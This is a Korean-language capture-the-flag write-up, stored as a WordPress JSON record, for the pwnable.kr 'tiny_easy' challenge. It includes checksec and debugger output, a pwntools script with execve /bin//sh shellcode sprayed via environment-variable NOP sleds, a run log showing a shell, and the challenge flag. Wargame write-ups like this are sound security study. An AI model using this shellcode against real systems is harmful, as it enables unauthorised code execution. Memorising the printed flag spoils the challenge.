{"id":3277,"date":"2025-04-10T19:09:54","date_gmt":"2025-04-10T10:09:54","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3277"},"modified":"2025-04-10T19:10:06","modified_gmt":"2025-04-10T10:10:06","slug":"tiny_easy","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3277","title":{"rendered":"tiny_easy"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">I made a pretty difficult pwn task.\nHowever I also made a dumb rookie mistake and made it too easy :(\nThis is based on real event :) enjoy.\n\nssh tiny_easy@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">checksec<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">tiny_easy@ubuntu:~$ checksec .\/tiny_easy\n[*] '\/home\/tiny_easy\/tiny_easy'\n    Arch:       i386-32-little\n    RELRO:      No RELRO\n    Stack:      No canary found\n    NX:         NX disabled\n    PIE:        No PIE (0x8048000)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Decompiled src<\/h1>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"329\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-1024x329.png\" alt=\"\" class=\"wp-image-3278\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-1024x329.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-300x96.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4-768x247.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-4.png 1426w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">Analysis<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x1       \n$ebx   : 0x0       \n$ecx   : 0x0       \n$edx   : 0x6d6f682f (\"\/hom\"?)\n$esp   : 0xffffd6b4  \u2192  0x0804805a  \u2192   add BYTE PTR [eax], al\n$ebp   : 0x0       \n$esi   : 0x0       \n$edi   : 0x0       \n$eip   : 0x6d6f682f (\"\/hom\"?)\n$eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x00 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xffffd6b4\u2502+0x0000: 0x0804805a  \u2192   add BYTE PTR [eax], al\t \u2190 $esp\n0xffffd6b8\u2502+0x0004: 0x00000000\n0xffffd6bc\u2502+0x0008: 0xffffd81d  \u2192  \"SHELL=\/bin\/bash\"\n0xffffd6c0\u2502+0x000c: 0xffffd82d  \u2192  \"HOSTNAME=2d0f4d9a440c\"\n0xffffd6c4\u2502+0x0010: 0xffffd843  \u2192  \"PWD=\/home\/ubuntu\/pwnable.kr\/tiny_easy\"\n0xffffd6c8\u2502+0x0014: 0xffffd869  \u2192  \"LOGNAME=ubuntu\"\n0xffffd6cc\u2502+0x0018: 0xffffd878  \u2192  \"_=\/usr\/bin\/gdb\"\n0xffffd6d0\u2502+0x001c: 0xffffd887  \u2192  \"LINES=66\"\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n[!] Cannot disassemble from $PC\n[!] Cannot access memory at address 0x6d6f682f\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"tiny_easy\", stopped 0x6d6f682f in ?? (), reason: SIGSEGV\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  \n\n<\/pre>\n\n\n\n<p>\uadf8\ub0e5 \ub2e8\uc21c\ud788 \uc2e4\ud589\uc2dc\ucf30\uc744\ub54c, <code>LOAD:08048058 call edx<\/code> \uc5d0\uc11c<\/p>\n\n\n\n<p><code>edx<\/code>\ub97c \ud638\ucd9c\ud558\ub294 \uc8fc\uc18c\uac00 <code>0x6d6f682f<\/code>, \uc720\ud6a8\ud558\uc9c0 \uc54a\uc740 \uc2e4\ud589\uc8fc\uc18c\uc5ec\uc11c \ud06c\ub798\uc2dc\uac00 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n<p>checksec\uc5d0\uc11c \ud655\uc778\ud574\ubd24\uc744\ub54c, \ubaa8\ub4e0 \ubcf4\ud638\uae30\ubc95\uc774 \uaebc\uc838\uc788\uae30 \ub54c\ubb38\uc5d0 \uc2a4\ud0dd\uc5d0 \uc258\ucf54\ub4dc\ub97c \ub123\uc5b4 \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n<p>\ub530\ub77c\uc11c \ud658\uacbd\ubcc0\uc218 \uc8fc\uc18c\ub97c \uc720\ucd94\ud574\uc11c nop sled\uac00 \uc788\ub294 \uc258\ucf54\ub4dc\ub97c \ub123\uc5b4\uc11c \uc258\uc744 \uc5bb\uc744 \ub54c\uae4c\uc9c0 \uacc4\uc18d \uc2e4\ud589\uc2dc\ud0a4\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">solve.py<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n# context.log_level = 'debug'\ncontext(arch='i386', os='linux')\nwarnings.filterwarnings( 'ignore' )\n\n# setregid(getegid(), getegid());\n# execve(\"\/bin\/\/sh\", {\"\/bin\/\/sh\", NULL}, NULL)\nshellcode = b'\\x31\\xc0\\xb0\\x32\\xcd\\x80\\x89\\xc3\\x89\\xc1\\x31\\xc0\\xb0\\x47\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80'\n\npayload = b\"\\x90\"*1000 + shellcode\n\narg = [p32(0xffab2d40)]\n\n_env = {}\nfor i in range(1000):\n    _env[str(i)] = payload\n\n# p = process(\".\/tiny_easy\")\n\nfor i in range(1000):\n    p = process(executable = \"\/home\/tiny_easy\/tiny_easy\", argv=arg, env=_env)\n    \n    try:\n        p.sendline(b\"id\")\n        p.recvline()\n    except:\n        print(f\"try: {str(i)}\")\n        continue\n\n    p.interactive()<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">tiny_easy@ubuntu:~$ mkdir -p \/tmp\/w4_tiny_easy\ntiny_easy@ubuntu:~$ cd \/tmp\/w4_tiny_easy\ntiny_easy@ubuntu:\/tmp\/w4_tiny_easy$ nano solve.py\n\ntiny_easy@ubuntu:\/tmp\/w4_tiny_easy$ python3 solve.py\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934062\ntry: 0\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934111\ntry: 1\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934137\ntry: 2\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934200\ntry: 3\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934352\ntry: 4\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934381\ntry: 5\n[+] Starting local process '\/home\/tiny_easy\/tiny_easy': pid 1934412\n[*] Switching to interactive mode\n$ ls\nsolve.py  tiny_easy\n$ cat \/home\/tiny_easy\/flag\nSuch_a_tiny_task:_Great_job_done_here!<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description checksec Decompiled src Analysis \uadf8\ub0e5 \ub2e8\uc21c\ud788 \uc2e4\ud589\uc2dc\ucf30\uc744\ub54c, LOAD:08048058 call edx \uc5d0\uc11c edx\ub97c \ud638\ucd9c\ud558\ub294 \uc8fc\uc18c\uac00 0x6d6f682f, \uc720\ud6a8\ud558\uc9c0 \uc54a\uc740 \uc2e4\ud589\uc8fc\uc18c\uc5ec\uc11c \ud06c\ub798\uc2dc\uac00 \ubc1c\uc0dd\ud55c\ub2e4. checksec\uc5d0\uc11c \ud655\uc778\ud574\ubd24\uc744\ub54c, \ubaa8\ub4e0 \ubcf4\ud638\uae30\ubc95\uc774 \uaebc\uc838\uc788\uae30 \ub54c\ubb38\uc5d0 \uc2a4\ud0dd\uc5d0 \uc258\ucf54\ub4dc\ub97c \ub123\uc5b4 \uc2e4\ud589\uc2dc\ud0ac \uc218 \uc788\ub2e4. \ub530\ub77c\uc11c \ud658\uacbd\ubcc0\uc218 \uc8fc\uc18c\ub97c \uc720\ucd94\ud574\uc11c nop sled\uac00 \uc788\ub294 \uc258\ucf54\ub4dc\ub97c \ub123\uc5b4\uc11c \uc258\uc744 \uc5bb\uc744 \ub54c\uae4c\uc9c0 \uacc4\uc18d \uc2e4\ud589\uc2dc\ud0a4\uba74 \ub41c\ub2e4. solve.py Result<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3277","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3277"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3277\/revisions"}],"predecessor-version":[{"id":3279,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3277\/revisions\/3279"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}